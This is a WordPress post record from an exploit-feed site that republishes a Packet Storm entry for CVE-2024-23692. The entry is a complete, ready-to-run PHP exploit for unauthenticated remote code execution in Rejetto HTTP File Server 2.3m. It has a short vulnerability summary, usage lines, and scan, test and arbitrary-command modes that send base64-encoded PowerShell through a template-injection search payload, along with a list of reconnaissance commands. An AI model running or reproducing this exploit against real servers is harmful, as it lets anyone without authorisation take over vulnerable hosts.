{"id":41404,"date":"2026-02-18T12:49:51","date_gmt":"2026-02-18T12:49:51","guid":{"rendered":"http:\/\/localhost\/?p=41404"},"modified":"2026-02-18T12:49:51","modified_gmt":"2026-02-18T12:49:51","slug":"rejetto-http-file-server-23m-unauthenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41404","title":{"rendered":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806"},"content":{"rendered":"

{“lastseen”:”2026-02-18T17:35:48″,”description”:”Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215806″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-23692″],”sourceData”:”=============================================================================================================================================\\n | # Title : Rejetto HTTP File Server 2.3m Unauthenticated RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : http:\/\/www.rejetto.com\/hfs\/ |\\n =============================================================================================================================================\\n \\n [+] Summary :\\n \\n A critical unauthenticated remote code execution vulnerability exists in Rejetto HTTP File Server (HFS) version 2.3m that allows attackers to execute arbitrary operating system commands \\n through template injection in the search functionality. The vulnerability enables complete system compromise without authentication.\\n \\n [+] Technical Description\\n \\n The vulnerability exists in Rejetto HFS’s template processing engine, specifically in the search functionality. \\n The application fails to properly sanitize user input in template expressions, allowing attackers to inject and execute arbitrary system commands through crafted template syntax.\\n \\n Vulnerable Code Pattern:\\n \\n procedure ProcessTemplate(var template: string);\\n \\n cmdResult: string;\\n \\n if Pos(‘{.exec|’, template) \\u003e 0 then\\n \\n cmdResult := ExecuteCommand(ExtractCommand(template));\\n template := ReplaceTemplateCommand(template, cmdResult);\\n end;\\n end;\\n \\n [+] Usage: \\n \\n # Vulnerability Scanning\\n \\n php exploit.php http:\/\/target:8080 –scan\\n \\n # Execute a Specific Command\\n \\n php exploit.php http:\/\/target:8080 \\”whoami\\”\\n php exploit.php http:\/\/target:8080 \\”ipconfig\\”\\n \\n # Test Multiple Commands\\n \\n php exploit.php http:\/\/target:8080 –test\\n \\n [+] POC :\\n \\n \\u003c?php\\n \\n \\n class HFSExploit {\\n private $colors;\\n \\n public function __construct() {\\n $this-\\u003ecolors = [\\n ‘GREEN’ =\\u003e \\”\\\\033[1;32m\\”,\\n ‘MAGENTA’ =\\u003e \\”\\\\033[1;35m\\”,\\n ‘CYAN’ =\\u003e \\”\\\\033[1;36m\\”,\\n ‘RED’ =\\u003e \\”\\\\033[1;31m\\”,\\n ‘BLUE’ =\\u003e \\”\\\\033[1;34m\\”,\\n ‘YELLOW’ =\\u003e \\”\\\\033[1;33m\\”,\\n ‘WHITE’ =\\u003e \\”\\\\033[1;37m\\”,\\n ‘RESET’ =\\u003e \\”\\\\033[0m\\”,\\n ‘BOLD’ =\\u003e \\”\\\\033[1m\\”\\n ];\\n }\\n \\n private function color($text, $color) {\\n return $this-\\u003ecolors[$color] . $text . $this-\\u003ecolors[‘RESET’];\\n }\\n \\n private function showBanner() {\\n $banner = $this-\\u003ecolor(\\”\\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n \\”, ‘CYAN’) . \\n $this-\\u003ecolor(\\”\\n \\n \\”, ‘MAGENTA’) .\\n $this-\\u003ecolor(\\”\\\\n CVE-2024-23692 – Rejetto HFS Unauthenticated RCE\\\\n\\”, ‘RED’) .\\n $this-\\u003ecolor(\\” @indoushka\\\\n\\\\n\\”, ‘WHITE’);\\n \\n echo $banner;\\n }\\n \\n private function encodePayload($command) {\\n \\n $psCommand = \\”echo [S]; $command; echo [S];\\”;\\n $utf16le = iconv(‘UTF-8’, ‘UTF-16LE’, $psCommand);\\n $base64 = base64_encode($utf16le);\\n \\n return $base64;\\n }\\n \\n private function makeRequest($url) {\\n $context = stream_context_create([\\n ‘http’ =\\u003e [\\n ‘method’ =\\u003e ‘GET’,\\n ‘timeout’ =\\u003e 15,\\n ‘ignore_errors’ =\\u003e true,\\n ‘user_agent’ =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ]\\n ]);\\n \\n $response = @file_get_contents($url, false, $context);\\n \\n if ($response === false) {\\n return [‘success’ =\\u003e false, ‘error’ =\\u003e ‘Request failed’];\\n }\\n $statusCode = 0;\\n if (isset($http_response_header[0])) {\\n preg_match(‘\/HTTP\\\\\/\\\\d\\\\.\\\\d\\\\s+(\\\\d+)\/’, $http_response_header[0], $matches);\\n $statusCode = isset($matches[1]) ? (int)$matches[1] : 0;\\n }\\n \\n return [\\n ‘success’ =\\u003e true,\\n ‘status_code’ =\\u003e $statusCode,\\n ‘content’ =\\u003e $response\\n ];\\n }\\n \\n private function extractResult($response) {\\n \\n $pattern = ‘\/\\\\[S\\\\](.*?)\\\\[S\\\\]\/s’;\\n if (preg_match($pattern, $response, $matches)) {\\n return trim($matches[1]);\\n }\\n \\n $lines = explode(\\”\\\\n\\”, $response);\\n $inResult = false;\\n $result = [];\\n \\n foreach ($lines as $line) {\\n if (strpos($line, ‘[S]’) !== false) {\\n if ($inResult) {\\n break;\\n } else {\\n $inResult = true;\\n continue;\\n }\\n }\\n \\n if ($inResult) {\\n $result[] = $line;\\n }\\n }\\n \\n return implode(\\”\\\\n\\”, $result);\\n }\\n \\n public function exploit($target, $command) {\\n $this-\\u003eshowBanner();\\n \\n $target = rtrim($target, ‘\/’);\\n \\n echo $this-\\u003ecolor(\\”[*] Target: \\”, ‘BLUE’) . $target . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Command: \\”, ‘BLUE’) . $command . \\”\\\\n\\\\n\\”;\\n $encodedCommand = $this-\\u003eencodePayload($command);\\n $payload = \\”\/?n=%0A\\u0026cmd=cmd+\/c+powershell+-enc+$encodedCommand\\u0026search=%25xxx%25url%25:%password%\\\\}\\\\{.exec|\\\\{.?cmd.\\\\}|timeout=15|out=abc.\\\\}\\\\{.?n.\\\\}\\\\{.?n.\\\\}RESULT:\\\\{.?n.\\\\}\\\\{.^abc.\\\\}====\\\\{.?n.\\\\}\\”;\\n \\n $exploitUrl = $target . $payload;\\n \\n echo $this-\\u003ecolor(\\”[*] Trying to exploit…\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Exploit URL: \\”, ‘CYAN’) . $exploitUrl . \\”\\\\n\\\\n\\”;\\n \\n $response = $this-\\u003emakeRequest($exploitUrl);\\n \\n if (!$response[‘success’]) {\\n echo $this-\\u003ecolor(\\”[-] Exploitation failed: \\” . $response[‘error’], ‘RED’) . \\”\\\\n\\”;\\n return;\\n }\\n \\n if ($response[‘status_code’] !== 200) {\\n echo $this-\\u003ecolor(\\”[-] Server returned status: \\” . $response[‘status_code’], ‘RED’) . \\”\\\\n\\”;\\n return;\\n }\\n \\n $result = $this-\\u003eextractResult($response[‘content’]);\\n \\n if (empty(trim($result))) {\\n echo $this-\\u003ecolor(\\”[-] No command output received\\”, ‘RED’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Full response for debugging:\\\\n\\”, ‘YELLOW’);\\n echo $response[‘content’] . \\”\\\\n\\”;\\n } else {\\n echo $this-\\u003ecolor(\\”[+] Exploitation successful!\\”, ‘GREEN’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[+] Command output:\\\\n\\”, ‘GREEN’);\\n echo $this-\\u003ecolor(str_repeat(\\”=\\”, 60), ‘CYAN’) . \\”\\\\n\\”;\\n echo $result . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(str_repeat(\\”=\\”, 60), ‘CYAN’) . \\”\\\\n\\”;\\n }\\n }\\n \\n public function testCommands($target) {\\n $this-\\u003eshowBanner();\\n \\n $target = rtrim($target, ‘\/’);\\n \\n echo $this-\\u003ecolor(\\”[*] Testing common commands on: \\”, ‘BLUE’) . $target . \\”\\\\n\\\\n\\”;\\n \\n $testCommands = [\\n ‘whoami’ =\\u003e ‘Current user’,\\n ‘hostname’ =\\u003e ‘System hostname’,\\n ‘ipconfig’ =\\u003e ‘Network configuration’,\\n ‘systeminfo’ =\\u003e ‘System information’,\\n ‘dir’ =\\u003e ‘Directory listing’,\\n ‘net users’ =\\u003e ‘Local users’\\n ];\\n \\n foreach ($testCommands as $cmd =\\u003e $description) {\\n echo $this-\\u003ecolor(\\”[*] Testing: \\”, ‘YELLOW’) . $description . \\” (\\” . $cmd . \\”)\\\\n\\”;\\n \\n $encodedCommand = $this-\\u003eencodePayload($cmd);\\n $payload = \\”\/?n=%0A\\u0026cmd=cmd+\/c+powershell+-enc+$encodedCommand\\u0026search=%25xxx%25url%25:%password%\\\\}\\\\{.exec|\\\\{.?cmd.\\\\}|timeout=15|out=abc.\\\\}\\\\{.?n.\\\\}\\\\{.?n.\\\\}RESULT:\\\\{.?n.\\\\}\\\\{.^abc.\\\\}====\\\\{.?n.\\\\}\\”;\\n \\n $exploitUrl = $target . $payload;\\n \\n $response = $this-\\u003emakeRequest($exploitUrl);\\n \\n if ($response[‘success’] \\u0026\\u0026 $response[‘status_code’] === 200) {\\n $result = $this-\\u003eextractResult($response[‘content’]);\\n \\n if (!empty(trim($result))) {\\n echo $this-\\u003ecolor(\\”[+] SUCCESS: \\” . $description, ‘GREEN’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[+] Output: \\” . trim($result), ‘CYAN’) . \\”\\\\n\\”;\\n } else {\\n echo $this-\\u003ecolor(\\”[-] No output received\\”, ‘RED’) . \\”\\\\n\\”;\\n }\\n } else {\\n echo $this-\\u003ecolor(\\”[-] Command failed\\”, ‘RED’) . \\”\\\\n\\”;\\n }\\n echo \\”\\\\n\\”;\\n }\\n }\\n \\n public function scan($target) {\\n $this-\\u003eshowBanner();\\n \\n $target = rtrim($target, ‘\/’);\\n \\n echo $this-\\u003ecolor(\\”[*] Scanning for Rejetto HFS vulnerability: \\”, ‘BLUE’) . $target . \\”\\\\n\\\\n\\”;\\n \\n $testCommand = \\”echo VULNERABLE\\”;\\n $encodedCommand = $this-\\u003eencodePayload($testCommand);\\n $payload = \\”\/?n=%0A\\u0026cmd=cmd+\/c+powershell+-enc+$encodedCommand\\u0026search=%25xxx%25url%25:%password%\\\\}\\\\{.exec|\\\\{.?cmd.\\\\}|timeout=15|out=abc.\\\\}\\\\{.?n.\\\\}\\\\{.?n.\\\\}RESULT:\\\\{.?n.\\\\}\\\\{.^abc.\\\\}====\\\\{.?n.\\\\}\\”;\\n \\n $exploitUrl = $target . $payload;\\n \\n echo $this-\\u003ecolor(\\”[*] Sending test payload…\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n \\n $response = $this-\\u003emakeRequest($exploitUrl);\\n \\n if ($response[‘success’] \\u0026\\u0026 $response[‘status_code’] === 200) {\\n $result = $this-\\u003eextractResult($response[‘content’]);\\n \\n if (strpos($result, ‘VULNERABLE’) !== false) {\\n echo $this-\\u003ecolor(\\”[+] TARGET IS VULNERABLE to CVE-2024-23692!\\”, ‘GREEN’) . \\”\\\\n\\”;\\n return true;\\n } else {\\n echo $this-\\u003ecolor(\\”[-] Target does not appear to be vulnerable\\”, ‘RED’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Response: \\” . substr($response[‘content’], 0, 200), ‘YELLOW’) . \\”\\\\n\\”;\\n return false;\\n }\\n } else {\\n echo $this-\\u003ecolor(\\”[-] Target not accessible or error occurred\\”, ‘RED’) . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n if ($argc \\u003c 2) {\\n echo \\”CVE-2024-23692 – Rejetto HTTP File Server RCE Exploit\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php exploit.php \\u003ctarget_url\\u003e \\u003ccommand\\u003e\\\\n\\”;\\n echo \\” php exploit.php \\u003ctarget_url\\u003e –test\\\\n\\”;\\n echo \\” php exploit.php \\u003ctarget_url\\u003e –scan\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target:8080 \\\\\\”whoami\\\\\\”\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target:8080 \\\\\\”ipconfig\\\\\\”\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target:8080 –test\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target:8080 –scan\\\\n\\”;\\n echo \\”\\\\nDescription:\\\\n\\”;\\n echo \\” Exploits unauthenticated RCE vulnerability in Rejetto HTTP File Server 2.3m\\\\n\\”;\\n echo \\” via template injection in search parameter (CVE-2024-23692)\\\\n\\”;\\n exit(0);\\n }\\n \\n $target = $argv[1];\\n $command = $argv[2] ?? ‘–scan’;\\n \\n if (!filter_var($target, FILTER_VALIDATE_URL)) {\\n echo \\”Error: Invalid target URL\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new HFSExploit();\\n \\n switch ($command) {\\n case ‘–test’:\\n $exploit-\\u003etestCommands($target);\\n break;\\n case ‘–scan’:\\n $exploit-\\u003escan($target);\\n break;\\n default:\\n $exploit-\\u003eexploit($target, $command);\\n break;\\n }\\n } else {\\n echo \\”This script is intended for command line use only.\\\\n\\”;\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215806″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215806\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-18T17:35:48″,”description”:”Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Rejetto HTTP File…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-41404","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41404\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-18T17:35:48″,”description”:”Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Rejetto HTTP File...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41404\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T12:49:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806\",\"datePublished\":\"2026-02-18T12:49:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\"},\"wordCount\":1601,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\",\"name\":\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T12:49:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41404","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem","og_description":"{“lastseen”:”2026-02-18T17:35:48″,”description”:”Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Rejetto HTTP File...","og_url":"https:\/\/zero.redgem.net\/?p=41404","og_site_name":"zero redgem","article_published_time":"2026-02-18T12:49:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41404#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41404"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806","datePublished":"2026-02-18T12:49:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41404"},"wordCount":1601,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41404#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41404","url":"https:\/\/zero.redgem.net\/?p=41404","name":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T12:49:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41404#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41404"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41404#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/w